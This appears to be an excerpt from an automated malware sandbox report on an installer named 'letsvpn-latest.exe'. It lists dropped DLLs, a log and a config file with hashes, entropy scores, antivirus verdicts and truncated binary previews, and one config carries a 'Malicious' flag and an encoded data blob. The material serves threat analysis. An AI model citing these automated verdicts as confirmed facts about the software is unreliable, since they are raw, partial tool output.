                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines (5130)
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):27026
                                                                                                                                                                                                  Entropy (8bit):5.4569968058295055
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:xBrbCvYVVQRlc1zeeSgDNZ7UcpE69SZDhH1tW2:xnVSe3v7B79SZDhH1tW2
                                                                                                                                                                                                  MD5:11752AA56F176FBBBF36420EC8DB613A
                                                                                                                                                                                                  SHA1:0AFFC2837CEE71750450911D11968E0692947F13
                                                                                                                                                                                                  SHA-256:D66328EB01118A727E919B52318562094F2FF593BD33E5D3AAB5E73602388DFA
                                                                                                                                                                                                  SHA-512:ED78045E4B6B85A1A0557C2CCD85A27E90DEFC48E50D2833D3D8D23526DC8D1040A64E883CB42AEA3052D499EA4C95E775384AE710B1222191EAD6F8B0E0B560
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>.<configuration>. <configSections>. <section name="EnvConfig" type="System.Configuration.NameValueSectionHandler"/>. </configSections>. <startup>. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6.2"/>. </startup>. <EnvConfig>. <add key="data" value="8qUKDZPCDXvOaDVs8FuZ4EwMGD2jARGuTIWGtDO+e3fEsHqjqqrglFmwqp7KOY8QMH1kAljyJOVtWMVEipmR5TuCV75j+eruloErdFV2Y/RtTWo84JUolxSAFRpwd5wg1W0E9mKcPxvlvvJQb1HJRwCwpj0w2JCHJEGNrToA+NR1cYS26LuC0sk0TVCSkCgRdg+7IVJ3Pctho+eHXL10l3ynrZTRN4DnQL7cPUjYQwAGTD8iLkXB1QWUUtPmQs7b1qkr4wc7j6LvMMXHLtX2r7fAwUpiCIMKTYYC28UIv3tiIlQCV2ZCcAOo0b53tGJUCu3xmIwdnZtfqxJTgnN7+yAdU/Z8V4gg8QEIeyq8Z8minRSVosis/SPO/uv0IfluKf6FDrK2YvY8lXQtb1kPN6aqfm2uRgWYBov/IPEorqaxGu+iu5d+jbWnnlDt8WFSkLlgHHp32U9hS/RtHkHitzcMasjUTCEMqwZWSD8U5h3E0ED34gjI+gRellktkXNMGk8enYzgefNAauE9qpInHsiGfxsVmawHV+PaXAP0n228vzh6s+XgcST0jFHL0ddpgnf6kORN4BDRjUtlikmqrMm3kl4LOnkRdVn3md7icRjHoMOZHLq9gfLNH9WVS7KJLE+KvOZbNuO6bDDQktk2mWOEvH02yvUvwJ4Rnywepm

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNDomainModel.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):23072
                                                                                                                                                                                                  Entropy (8bit):6.539242531365027
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:e8KcT7wZJt+/AeHVSh1hqWOHlLf2KQcvBZ9ymGS+ShjmM6IGBkSL6B:NT7wZL+4a07q3b2KZBZhGS+ST6nkB
                                                                                                                                                                                                  MD5:4FB031CB8840EE01CB6AA90696557143
                                                                                                                                                                                                  SHA1:B009C8C975929B73DD977969E6816066D57F39C6
                                                                                                                                                                                                  SHA-256:64B09932EF5B25F5C2C185FE955C7784AB23CDF7D12FDAD77FE05947E20006BA
                                                                                                                                                                                                  SHA-512:03731C0F6423F2FA3D6710B86C7CC41AA970058B818AB724321040984841DC451109638C813D564CB89DD00AF3962E84811AED5A3B37AE9A1B9C1FEBEB85AE60
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..$..........VC... ...`....... ....................................`..................................C..O....`...............,.. ...........tB..8............................................ ............... ..H............text...\#... ...$.................. ..`.rsrc........`.......&..............@..@.reloc...............*..............@..B................7C......H.......P#..$...........................................................2r...p.(....*..(....*..(....*6r%..p..(....*6ru..p..(....*2r...p.(....*6r...p..(....*6rg..p..(....*2r...p.(....*2r...p.(....*:r...p...(....*.rs..p......%...%...%...%...%....(....*..(....*6r...p..(....*2rn..p.(....*2r...p.(....*2r...p.(....*2r...p.(....*.rz..p......%...%...%...%...%....%....(....*2r...p.(....*..(....*2r...p.(....*6r...p..(....*:rI..p...(....*2r...p.(....*2r...p.(....*6r...p..(....*6ro..p..(

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNInfraStructure.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):31264
                                                                                                                                                                                                  Entropy (8bit):6.461508448145288
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:43kT+4YzHC2I3fpmoq3b2KZBZUS+ST6nkc:p+tHCHv4L3qKW/mm
                                                                                                                                                                                                  MD5:59D3183B3719B7F94E21F783594C63E9
                                                                                                                                                                                                  SHA1:ECA6B8C4211A09338EDE54E72D0729D7288F304F
                                                                                                                                                                                                  SHA-256:5A23DFB54F4AAFB8409687ED44A3AFF776BBDCE5008133D05C2F9A6F4E8F9466
                                                                                                                                                                                                  SHA-512:14F61E069A0CC203357AC7ABF9DFA4B1CD688C9B02020577669CEA3085704C90D58F09179155DA175C00D03D5700144A84524018CED00A6DDDA01F912E182242
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..D...........c... ........... ....................................`..................................c..O....................L.. ............c..8............................................ ............... ..H............text....C... ...D.................. ..`.rsrc................F..............@..@.reloc...............J..............@..B.................c......H.......X)...9...........................................................0..t...............................(.......(.......(!.........(....(....~....(...+~....(...+(....%(......r...p.(....(....(....*.0..U........(.....(....(....%(.....r=..p.r...p.(....(.....r...p.(....(....r...p.(....(....(....*....0..\........(......(.....(....(....%(.....r...p.r...p.(....(.....r9..p.(....(....r9..p.(....(....(....*.0..)........(....(....%(......r...p.(....(....(....*....0..$........(....%(

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Log\Lets.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:ASCII text, with very long lines (8772)
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):111769
                                                                                                                                                                                                  Entropy (8bit):6.012337158598234
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:aLYPh6117u2paSgOol55mwVCPEAdZe7xpO78I04oPEST3z/eZsS8fCB7GpC5E5mI:a661hDp2lmwgVZe7xpO78I04oPEST3zx
                                                                                                                                                                                                  MD5:212E515357106E809B265CF82CB3E43B
                                                                                                                                                                                                  SHA1:4CFCFF5464DCAF0111EB65D23EEDE7D9829A3DFB
                                                                                                                                                                                                  SHA-256:3DD3D520668D8CB24AFAB01B65B1995E325BF7834D33B58D39776E9CCBA6B358
                                                                                                                                                                                                  SHA-512:EB8432F286BA3B68A11365BDA9A964C4BD8D5C965BB23B04C46EC7247054420DE45BF75F92E59DFDD04E15B20D3EED071D58F8292F0D8941D42C7CF9C9CF4A93
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:TUhp7MNiskusbT6a7B1E/TBW6yr6uU7gRyQ4Kd7XWb7j3+OyqSXS5ImniEwdUUp3rNfHU1id.TUhp7MNiskusbT6a7B1E/TBW6yr6uU7gRyQ4Kd7XWb7j3+OyqSLT7ImXmFICGFV4Zi7KI6z09Jhu4AyREFzcysR5+shtmYg=.TUhp7MNiskusbT6a7B1E/TBW6yr6uU7gRyQ4Kd7XWb7j3+OyqSXS5ImYg0oLX1dw+XPSHHdeppRjAADqMQ==.TUhp7MNiskusbT6a7B1E/TBW6yr6uU7gRyQ4Kd7XWb7j3+OyqS3x38WUm1sCcUtwlyZBZDPanD+QE/e1hsBxupsH+okTXQCJZeIiUtiYIGDD5MdNVI4iRvuMS8achUSe8xdVhZj9IdjimlomxzWqQZucWL4qRry9TK5XQ8bZ5i/o1VSfM+SCsbaDBOeISTNbC8Pf+pnkpdFVOuv4PVPzKeiNHSPkrh5velt55p/jspBzul9BVUdZSgFN6Cln7imQO3gJ6jViZvw6CxIP6VmxP7yKPf/3MGgDpshufFMtOSdrl3PUPR5ZiVExFHt/2PGwLkaLowoKkH0E+hpJgk9OKVCRhkUKQeeNKmjvAocTa4R2BEJk74RWpKoYOTUTAuJaRki/+jftCuMK2A1eMPCugVHBVdBci9cZJIaqQSuiexDYbcx9fGSeH+VdPFwMeXqVEGAq//iYaud1cgukJTy+gWe19eaTocYJ3umP7p5g/+SVuvck/rJKAUJPR+N6/j4msTB23buU0aORK+npkNApyVKQdCOnEUpIH9DHfnunuYP8JbFQnVVEsbhBPrDGMmM2g+3NoA==.TUhp7MNiskusbT6a7B1E/TBW6yr6uU7gRyQ4Kd7XWb7j3+OyqSLywcyfmR4LVlNwlvgy3PZjKK83yGA3TRlBOCjaWQ==.TUhp7MNiskusbT6a7B1E/TBW6yr7sEvgRyQ4Kd7XWbZUQhy7LeBZwbGOOFpM1DDIKf/

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\MdXaml.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):123424
                                                                                                                                                                                                  Entropy (8bit):6.268913876963886
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:00OQlavbPZKNK9hhmPZEMn5xGFE45N+cX8fZzd97WWhT5wNSAQr7YTFoVaoOT8TQ:0b5vb/lmhMNGzWWhTdTK5N8Kg/I
                                                                                                                                                                                                  MD5:804EFCB7A1A2442810E3D05FDE0519DD
                                                                                                                                                                                                  SHA1:6FD55EC5795CEE7819B33EB2B86A99A2D2677D90
                                                                                                                                                                                                  SHA-256:181BB25BA4F3AF4BF678F6DA27C8B6AC6290308C144D5607B4978A6502B1C151
                                                                                                                                                                                                  SHA-512:8350BC4FD80527BA8C8FB12D5ECCCF62BF099DA06016EDEFA56FA0F24FC1EF387220DB1A9B434BE5136360599BC09F8AD92639122D5447143B55330B6ECC1D63
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....w..........." ..0.............R.... ........... ....................... ......J.....`.....................................O....................... ...........4...T............................................ ............... ..H............text...X.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................3.......H........z..@...........,D...............................................(....*..0..l.......r...p.s.........( ....o!......s"....+%...n...%....o#.....~............o$....o%...%.-....,..o......,..o.....*......$.3W..........Ea......f~....-.(....~......o&...*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{ ...*"..} ...*F.~!...('...t....*6.~!....((...*..{"...*"..}"...*..{#...*"..}#...*..{$...*"..}$...*..{%...*"..}%...*..{&...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Analytics.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):25120
                                                                                                                                                                                                  Entropy (8bit):6.665914468487181
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:AH9oR6XScb7Fj7t6Yq3b2KZBZVzS+ST6nkc:Ay6XScbJj7t6b3qKj/mC
                                                                                                                                                                                                  MD5:E5D273B75C14961ED64B6D6A847C5AE2
                                                                                                                                                                                                  SHA1:72BFFAE47ED211EFABE455448C821E696BA9075C
                                                                                                                                                                                                  SHA-256:8C7BD931B6535B314BD6DE57ED60B36529348FDFAC50F50055818E042FF8CF8D
                                                                                                                                                                                                  SHA-512:87B66800D0A7CBD58DC87DA33639BC844D937E32B441665966965CF39F9733B400786846581FACCCFE87EF86C1DD855940425FF449A53AD9955765626A38E807
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,.q..........." ..0..,...........J... ...`....... ..............................p.....`.................................UJ..O....`...............4.. ...........@I..T............................................ ............... ..H............text....*... ...,.................. ..`.rsrc........`......................@..@.reloc...............2..............@..B.................J......H.......`*...............................................................0..H.........~....,...~....*~..........(......~....%-.&s....%...........,..(......*........#<.......0..%.......~..........(...............,..(.....*....................0..........~..........(....(....o....(...+....,..(......*...........".......0..0.......~..........(....(.....o.....(...+....,..(......*.........$.......0..).......~..........(....(......o.......,..(.....*....................0..C........(..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Crashes.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):53792
                                                                                                                                                                                                  Entropy (8bit):6.30664826170408
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:9qr8YZ2IPJ1hCmfPzcscksOOWwp/fFCHUHGoH0w8eKYIySh6TOq3b2KZBZHPS+S/:93aJBOkAHaUm08eKYIITB3qKl/mZ1
                                                                                                                                                                                                  MD5:80C2EAC1F7420578A13331614291866A
                                                                                                                                                                                                  SHA1:759C0EF56DB6F407E5796CE6DEE2D8D19EF367F3
                                                                                                                                                                                                  SHA-256:30B86B4326E0C77AB66392BEEA678934BD396D37CEE4C35C358783EA1CD4828B
                                                                                                                                                                                                  SHA-512:A1D118E3B1C6B522FB54ACEE5CC2B48F15044C622A285025D1478A2988B939284E274323E802A1B068B5610A010BF87E6F430689FD7987CE4A8B24D0FAF2E957
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..............." ..0.................. ........... ...................................`.....................................O....................... ...............T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........D...t..........................................................&...(....*2.r...p(....*..0..'.......~.........(....t............(...+...3.*..0..'.......~.........(....t............(...+...3.*..0..'.......~.........(....t............(...+...3.*..0..'.......~.........(....t............(...+...3.*..0..'.......~.........(....t............(...+...3.*..0..'.......~.........(....t............(...+...3.*..(....*.(....*..(....*.(....*.(....*.(....*.s....zr.-.rM..pro..p(....*..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):143904
                                                                                                                                                                                                  Entropy (8bit):6.0435655988094465
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:YXiDdWM0c7K9ES99d3+uVIQNlHK6Uav1vP8F6D0/5:zdWM0cW9EONvHKwvP8FWw
                                                                                                                                                                                                  MD5:BFFA4E71462CA66C7D8D918C90A341E9
                                                                                                                                                                                                  SHA1:20CA82B113D96225E34720B838AEEBE8F9B2980A
                                                                                                                                                                                                  SHA-256:9BBCCFE3E720F2B6ECB1EAD65C7AA95808DB459F6948B3D68328673D52C4A5B8
                                                                                                                                                                                                  SHA-512:4546BF89CB11FAA9E888DCDA503904EE4E50BF81A9C23BACF7C6F4146F035F97C37D351A7E6DBD040342C4751B8757CFD53B1C66696F2AE58594636DE6FD78BD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....gu..........." ..0.............f.... ... ....... .......................`......Bb....`.....................................O.... ..|............... ....@..........T............................................ ............... ..H............text...|.... ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B................H.......H...........PR...........................................................0..H.........~....,...~....*~..........(......~....%-.&s....%...........,..(......*........#<.......0..%.......~..........(...............,..(.....*....................(g...*..(h...*..,..o.......(e...r...p(n...*.(....*..0..#.......~..........(.............,..(.....*..................0..#.......~..........(.............,..(.....*..................0..........~..........(....(....o....(...+....,..(......*..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Bcl.AsyncInterfaces.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):24608
                                                                                                                                                                                                  Entropy (8bit):6.744944549827833
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:e/f1IDjV9UPPpWoq3b2KZBZeY8CS+ST6nkI:uf1IDjPOPpWL3qKI3C/mO
                                                                                                                                                                                                  MD5:02D5FC80DC55645778A4D78A24723780
                                                                                                                                                                                                  SHA1:13B2CAB89FF056437287369E1728D64943C71577
                                                                                                                                                                                                  SHA-256:2722C7F315E967D9676CE6B5BEB510D6FCEE0D6F5B05AEE1D69A563071D6E618
                                                                                                                                                                                                  SHA-512:78E6F13C680E883022C09E743253EE7A7ACF8F5C50DD3302D244D95D1E3D58ABC66029083320275D6485AC92F710401A064E1740EB67FE2D2329A2A516252DCD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Q..........." ..0..&...........E... ...`....... ....................................`.................................[E..O....`...............2.. ...........hD..T............................................ ............... ..H............text....%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............0..............@..B.................E......H.......4&.......................C........................................(....*..(....*.0....................(....}.....*6.|.....(...+*:.|......(...+*:.|......(...+*2.|....(....*..{....%-.&.|....s.....(....%-.&.{....*"..(....*>..}......}....*..0...........{....o........{....(....*Z..}......}......}....*N.{......{....s ...*N.{.....{.....s ...*v.{.....{....o!....{....s"...*..(....*"..s....*.0.....................s#...*&...s#...*..{$...*"..}$...*.0..F.........{%....Xh}%.....}&.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Expression.Interactions.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):103456
                                                                                                                                                                                                  Entropy (8bit):6.150159893883683
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:jrf5GttgxHXEuRmG5rtkGY4CEmWAxXSSYhhS98ca2Wvsd65FJDlGWwkEyB3qKp+g:P5GttWHXEUx5r65LxXshk8JDIWPBoY/9
                                                                                                                                                                                                  MD5:EF4503A4D4843EE0342E775B66597B48
                                                                                                                                                                                                  SHA1:7C32086B782934EE2A1C3D0F87EA99E916CA2C61
                                                                                                                                                                                                  SHA-256:2116A48BEC23CCCC6B993654AD476E1F833F453548CFC209A9F21196BADB6B0B
                                                                                                                                                                                                  SHA-512:A4052E06CE8C17649FEC8B202AC316B9A44C9196BC7B019E1F31052C2AB77E9E338345B42F8A1E5C51278A51B776941261CCE2B0BC66A77EF542ADD8B596CC6B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...eu.K...........!.....\...........z... ........@.. ...............................0....@..................................y..K....................f.. ............x............................................... ............... ..H............text...$Z... ...\.................. ..`.rsrc................^..............@..@.reloc...............d..............@..B.................z......H...........L...........x...1...P ........................................z...y.k.....bdd I..`..).PsR@... .aL...%:...y.....XDgM.X}..~)2.v-..4..........EAZZ...,..[..H...o5*C.o...5/I.m.!2...#.:.(......}....*:.(......}....*...0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*"..(....*"..(....*..*..{....,..{.....o....*.{....o....*2.~....(....*6.~.....(....*F.~....(....td...*6.~.....(....*J.(.....s ...}....*F.(...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Toolkit.Uwp.Notifications.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):163360
                                                                                                                                                                                                  Entropy (8bit):6.226529376890851
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:c4burBkDijpS3+n1Sr5ePVM761+fAwb0A/z:ciikDiw3+1af761+rY+
                                                                                                                                                                                                  MD5:D80339E7A59BA5938DDA47AB253C3F5B
                                                                                                                                                                                                  SHA1:9AF9D1AB6EB6E73ED0E42EC45D76C29BDA7FA5C8
                                                                                                                                                                                                  SHA-256:B649549A1E2A8CD22A14F6202AD80AB30119937CC1D69B2FBDD3D9A1FB37A13E
                                                                                                                                                                                                  SHA-512:126FC5A50D36D7734D2BBCD63703D65720EB7DC0548C8275771EDED722A6F3F26787845F86A2C9D76364E1DEA204750E41140DB5EF714D2A772CCF236CF1267A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....G..........." ..0..F...........e... ........... ...............................l....`.................................Qe..O.......p............P.. ...........\d..T............................................ ............... ..H............text....E... ...F.................. ..`.rsrc...p............H..............@..@.reloc...............N..............@..B.................e......H.......l...p....................c........................................(*...*..(*...*^.(*......d...%...}....*:.(*.....}....*:.(*.....}....*V!..R{*....s+........*..{....*"..}....*....0..Z........(....o,...-.r...ps-...zs0.....(....o.....+..o/.....o+....o5...o0....o....-....,..o......*........*.$N......J.s1...}.....(2...*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*6.|.....(I...*..{....*"..}....*..{....*"..}....*V.(....-.r...p*.(....*..(J...%.(....o>...%.(....o@

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.Core.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):146464
                                                                                                                                                                                                  Entropy (8bit):5.810766544493159
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LSiitDW10Oug94BeCCepM1STU/xnW+W6jfM0amyw0VzGLC1grekKtk0do/9o8afk:uiNang9meCCepM1ST+xnW+W6jfM0amyw
                                                                                                                                                                                                  MD5:CE7AC0EA44FF270ADD7888FE3952A592
                                                                                                                                                                                                  SHA1:9B2193D472191A303B37CD2F0CBA5493E367BE77
                                                                                                                                                                                                  SHA-256:24BD1E22D0F674442D607C0552AC2C3F55EBCE8B3D81D6BD73D244AA2133D5C3
                                                                                                                                                                                                  SHA-512:D4DC9509200BBD00CE2480488C8E4A19CB8DCDEBF7F1B33BBF0A45B1441C2AE3F33EC8CFA374892632E1A8BEB8A7318766750678E97D877295995837DC5883BA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...vJ.`.........." ..0..............$... ...@....... ..............................~.....@..................................$..O....@.................. ....`......T#............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................$......H........q......................".......................................0..H.........(....o.........,....+..{.........,....(....o....s`...}......{.....+..*.0..a.........(.........,R..(....o......uQ........, .sd.....uQ........{....o6.....+...r...ps........og......*....0..>.........{.........,%....{....ti...}.........ru..p.s)...z..{.....+..*...........$......&...}....*z..}.....(*.......}.....(.....*>.(....o.......*R.(.....-..+..o.....*...0............(....o....(.....+..*R..(..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.WinForms.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):31776
                                                                                                                                                                                                  Entropy (8bit):6.576538838641731
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:3LNoCdzhFQj/hJTBbGXZDDcULH4JVrwRSgBucQgJa5/Zi/dUDyqz1POMrhq3b2KY:3LqCHmTxGXZDDcULH4JVrwRSgBuvgJad
                                                                                                                                                                                                  MD5:C1994BBFAF6A739406029ED8676659D0
                                                                                                                                                                                                  SHA1:31530C18F2346BCCCE9ED1C78C574CD984C1F6EF
                                                                                                                                                                                                  SHA-256:6DD308156CF036D9972BE22FD6A5BA4767A5C22C9C7DA452F260CE9E0C2A083A
                                                                                                                                                                                                  SHA-512:2FB3FAC797357993D88C282C520D26C2EEB25BE85D82CCA092283E17B47C174DA842AACA8C128BB7C055E57A8020A221EA0EEA9BF340129E8B5ACC19D43E4938
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...dCd..........." ..0..D...........b... ........... ...............................(....`..................................b..O....................N.. ............a..8............................................ ............... ..H............text....B... ...D.................. ..`.rsrc................F..............@..@.reloc...............L..............@..B.................b......H........0..h0..................Da........................................(....*..{....*>..}......}....*..{....*>..}......}....*..{....*>..}......}....*..{....-%..(.....(......(......s....(....}.....{....*r.#.......?}.....(.....(I...*..,..(....,.*.(....,..(.....{....,..{....o......(....*.0..................s....(............s....(.....(.......?...s ...o!....(.......>...s"...o#....(.......A...s$...o%....(.......@...s&...o'....(.......B...s(...o)....{.......C...s*...o+....{....

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.Wpf.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):34336
                                                                                                                                                                                                  Entropy (8bit):6.562572630329577
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:knD8wecsVygSvqa8ZDPLryER0SO4JVrTYIWUpDkS/Ka5/Bi/W7v4F4zfKwaq3b2U:k7eN4vqa8ZDPLryER0SO4JVrTYIWUpDF
